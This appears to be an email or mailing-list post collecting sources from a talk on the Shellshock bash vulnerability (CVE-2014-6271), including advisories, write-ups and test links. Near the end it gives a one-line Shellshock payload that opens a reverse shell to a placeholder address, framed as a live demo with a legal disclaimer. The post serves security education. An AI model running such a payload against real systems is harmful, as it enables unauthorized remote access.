<div dir="ltr">sources from my talk earlier:<br><br>cve<br><a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271" target="_blank">http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271</a><br>better explanation<br><a href="http://seclists.org/oss-sec/2014/q3/650" target="_blank">http://seclists.org/oss-sec/2014/q3/650</a><br>easy to use poc<br><a href="https://pay.reddit.com/r/netsec/comments/2hbxtc/cve20146271_remote_code_execution_through_bash/" target="_blank">https://pay.reddit.com/r/netsec/comments/2hbxtc/cve20146271_remote_code_execution_through_bash/</a><div>pretty decent writeup<br><a href="http://www.troyhunt.com/2014/09/everything-you-need-to-know-about.html" target="_blank">http://www.troyhunt.com/2014/09/everything-you-need-to-know-about.html</a><br><div>ping scan</div><div><a href="http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html" target="_blank">http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html</a></div><div>local bash test<br><a href="http://security.stackexchange.com/questions/68168/is-there-a-short-command-to-test-if-my-server-is-secure-against-the-shellshock-b" target="_blank">http://security.stackexchange.com/questions/68168/is-there-a-short-command-to-test-if-my-server-is-secure-against-the-shellshock-b</a></div><div><br></div><div>and this is the live demo i would have done if my vps host wasn't being dos'd. don't run this on anything you don't (already) own<br>() { :; }; bash -i >& /dev/tcp/X.X.X.X/8080 0>&1<br><br>mail me to discuss public demos if you need to scare the shit out of your boss for a budget increase :)</div><div>but seriously, don't break the law. if you do it's not my fault. i'm not liable. don't sue me. ass covered.</div></div></div>